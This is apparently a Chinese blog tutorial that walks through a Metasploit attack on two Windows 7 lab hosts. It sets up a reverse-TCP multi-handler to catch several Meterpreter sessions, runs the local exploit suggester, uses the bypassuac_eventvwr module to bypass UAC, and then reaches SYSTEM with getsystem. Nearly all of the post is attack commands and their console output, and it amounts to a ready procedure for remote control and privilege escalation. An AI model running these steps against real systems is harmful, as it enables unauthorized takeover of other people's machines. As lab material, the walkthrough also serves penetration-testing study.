最近有个问题苦恼了我很久,“msf”是否可以控制多台服务器,怎么通过“msf”进行提权操作?
这里我直接开启了两台win7SP1X64的主机,通过运行后门的方式获得shell,这里生成shell的步骤略过。
获得服务器shell
首先我们在kali里面开启msf并调用exploit/multi/handler
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.142.19
lhost => 192.168.142.19
msf5 exploit(multi/handler) > set exitonsession false
exitonsession => false
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.142.19:4444
msf5 exploit(multi/handler) > [*] Sending stage (176195 bytes) to 192.168.142.24
[*] Meterpreter session 1 opened (192.168.142.19:4444 -> 192.168.142.24:52612) at 2020-10-30 10:15:32 +0800
msf5 exploit(multi/handler) >
[*] Sending stage (176195 bytes) to 192.168.142.101
[*] Meterpreter session 2 opened (192.168.142.19:4444 -> 192.168.142.101:49230) at 2020-10-30 10:15:50 +0800
msf5 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows WY-PC\WY @ WY-PC 192.168.142.19:4444 -> 192.168.142.24:52612 (192.168.200.128)
2 meterpreter x86/windows W-Y-PC\W-Y @ W-Y-PC 192.168.142.19:4444 -> 192.168.142.101:49230 (192.168.142.101)
msf5 exploit(multi/handler) >
这里要特别注意两个位置:
set exitonsession false:可以让建立监听的端口继续保持侦听。可以接受多个session
exploit -j:后台监听
windows提权:
进入到meterpreter中后,可以使用getsystem命令简单提权:
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
但这种提权成功的概率较小,这里我们可以通过post/multi/recon/local_exploit_suggester模块进行提权检测:
msf5 exploit(multi/handler) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
msf5 exploit(multi/handler) > use 0
msf5 post(multi/recon/local_exploit_suggester) > set session 1 //指定主机
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.200.128 - Collecting local exploits for x86/windows...
[*] 192.168.200.128 - 34 exploit checks are being tried...
[+] 192.168.200.128 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 192.168.200.128 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 192.168.200.128 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.200.128 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 192.168.200.128 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.200.128 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.200.128 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.200.128 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 192.168.200.128 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
可以看到已经将可调用的模块枚举出来,我们这里选择模块直接调用即可:
msf5 > use exploit/windows/local/bypassuac_eventvwr
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/bypassuac_eventvwr) > show options
Module options (exploit/windows/local/bypassuac_eventvwr):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.142.19 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
msf5 exploit(windows/local/bypassuac_eventvwr) > set session 1
session => 1
msf5 exploit(windows/local/bypassuac_eventvwr) > run
[-] Handler failed to bind to 192.168.142.19:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (176195 bytes) to 192.168.142.24
[*] Meterpreter session 3 opened (192.168.142.19:4444 -> 192.168.142.24:52764) at 2020-10-30 10:30:41 +0800
[*] Cleaning up registry keys ...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/bypassuac_eventvwr) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows WY-PC\WY @ WY-PC 192.168.142.19:4444 -> 192.168.142.24:52612 (192.168.200.128)
2 meterpreter x86/windows W-Y-PC\W-Y @ W-Y-PC 192.168.142.19:4444 -> 192.168.142.101:49230 (192.168.142.101)
3 meterpreter x86/windows WY-PC\WY @ WY-PC 192.168.142.19:4444 -> 192.168.142.24:52764 (192.168.200.128)
msf5 exploit(windows/local/bypassuac_eventvwr) > sessions 3
[*] Starting interaction with 3...
meterpreter > getuid
Server username: WY-PC\WY
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
版权声明:本文为qq_40549070原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。